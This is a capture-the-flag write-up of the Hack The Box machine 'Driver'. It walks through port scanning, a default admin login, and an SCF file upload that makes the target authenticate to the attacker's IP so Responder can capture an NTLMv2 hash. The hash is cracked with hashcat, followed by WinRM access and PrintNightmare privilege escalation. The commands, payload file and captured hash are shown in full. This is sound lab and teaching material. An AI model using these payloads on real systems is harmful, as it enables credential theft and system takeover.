/ HACKTHEBOX, CTF, EASY

Driver Write Up

cover

Overview

Driver is a easy box from Hack The Box, demonstrating the impact of the Windows PrintNightmare vulnerability and also I learnt about SCF files. This was a new attack vector for me.

Nmap

I deployed the machine and was given the target IP 10.10.11.106. I started a NMAP scan to check the available ports.

└──╼ $sudo nmap -sC -sV -oA nmap/initial 10.10.11.106
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-27 17:20 GMT
Nmap scan report for 10.10.11.106
Host is up (0.020s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-02-28T00:20:49
|_  start_date: 2022-02-27T04:55:51

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.89 seconds

3 Ports open:

  • 80 - HTTP - Microsoft IIS httpd 10.0
  • 135 - MSRPC - Microsoft Windows RPC
  • 445 - SMB - Microsoft Windows 7 - 10 microsoft-ds

I also ran a full port scan and found winrm to be open on port 5985.

└──╼ $sudo nmap -p- -oA nmap/all_ports 10.10.11.106
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-27 17:25 GMT
Nmap scan report for 10.10.11.106
Host is up (0.026s latency).
Not shown: 65531 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
5985/tcp open  wsman

The web service is showing an unauthorized response however it could be leaking a username with the message “Please enter password for admin”.

Enumeration

Before looking at the web service I tried enumerating SMB with various tools such as smbmap, smbclient and CrackMapExec however I had no joy.

└──╼ $cme smb 10.10.11.106
SMB         10.10.11.106    445    DRIVER           [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
┌─[daz@parrotos]─[~/Documents/HackTheBox/Driver]
└──╼ $smbmap -H 10.10.11.106
[!] Authentication error on 10.10.11.106

So I turned my attention to the web service. Navigating to the IP I did get a login prompt. I tried admin:admin and got in!

login

Once logged in, I get a simple web page but an email address of ‘support@driver.htb’. I updated my host file with ‘driver.htb’ just in case I need it later.

homepage

The only link that works on the web page is ‘Firmware Updates’. This page provides an upload function. I played around with this for such a long time, trying attacks like XSS, uploading PHP shells but nothing worked.

upload

However re-reading the line:

Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.

I decided to change my google search to “http smb file share exploit” and found an article on using SCF files.

Initial Access

The first article that returned was from Penetration testing lab https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/. After reading the article I created the file test.scf using the example they provide and changed the IP to my VPN IP.

└──╼ $cat test.scf 
[Shell]
Command=2
IconFile=\\10.10.14.11\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop

I started responder with the command ‘sudo responder -I tun0’.

Then uploaded the file using the web upload function and got a hit from responder

[SMB] NTLMv2-SSP Client   : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:87ea6d299d14fa32:ED6355EFB0444E974805B3FF0E0B9B26:0101000000000000803021AB042CD801AE67B0D5B0D050060000000002000800350054003400480001001E00570049004E002D0
0350032003700430037004C004F004F0030004300360004003400570049004E002D00350032003700430037004C004F004F003000430036002E0035005400340048002E004C004F00430041004C000300140035005400340048002E004C004F004
30041004C000500140035005400340048002E004C004F00430041004C0007000800803021AB042CD80106000400020000000800300030000000000000000000000000200000C974CDC12A32C5BFD81B375A1DECF3BF2FF300E27CB3440A6AC953C
7F84AACEA0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0031003100000000000000000000000000

I put the hash in to a file called ‘hash’ and used hashcat to crack it with the command hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt.

Now I had a username and password I was able to use winrm to login. To login I used Evil-WinRM.

└──╼ $/opt/evil-winrm/evil-winrm.rb -u tony -i 10.10.11.106
Enter Password: 

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\tony\Documents> 

Priv Esc

Now I had a foothold, I did some basic enumeration of the box. Looking at the running services I could see the Windows print spooler service.

    381      23     5164      14448 ...12            1128 spoolsv

This made me think of the PrintNightmare exploit. I could also have used rpcdump to find this.

└──╼ $rpcdump.py 10.10.11.106 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol 

To exploit this I used the exploit created by Caleb Stewart and John Hammond.

I used git to clone the repo in to my /opt directory.

└──╼ $sudo git clone https://github.com/calebstewart/CVE-2021-1675.git
Cloning into 'CVE-2021-1675'...
remote: Enumerating objects: 40, done.
remote: Counting objects: 100% (40/40), done.
remote: Compressing objects: 100% (32/32), done.
remote: Total 40 (delta 9), reused 37 (delta 6), pack-reused 0
Receiving objects: 100% (40/40), 131.12 KiB | 932.00 KiB/s, done.
Resolving deltas: 100% (9/9), done.
┌─[daz@parrotos]─[/opt]
└──╼ $cd CVE-2021-1675
┌─[daz@parrotos]─[/opt/CVE-2021-1675]
└──╼ $ls
CVE-2021-1675.ps1  nightmare-dll  README.md

Now using Evil-WinRM I can upload the powershell script and execute it.

*Evil-WinRM* PS C:\Users\tony\Documents> upload /opt/CVE-2021-1675/CVE-2021-1675.ps1
Info: Uploading /opt/CVE-2021-1675/CVE-2021-1675.ps1 to C:\Users\tony\Documents\CVE-2021-1675.ps1

                                                             
Data: 238080 bytes of 238080 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\tony\Documents> Import-Module C:\Users\tony\Documents\CVE-2021-1675.ps1
*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user  as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll

It worked! I canceled my current WinRM session and logged back in using the new credentials.

*Evil-WinRM* PS C:\Users\tony\Documents> exit

Info: Exiting with code 0

┌─[daz@parrotos]─[~/Documents/HackTheBox/Driver]
└──╼ $/opt/evil-winrm/evil-winrm.rb -u adm1n -i 10.10.11.106
Enter Password: 

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\adm1n\Documents> cd C:/Users/Administrator/Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/26/2022   8:56 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt

Thats the box, thanks for reading!

==========================================================================

Any comments or feedback welcome! You can find me on twitter.

Buy Me A Coffee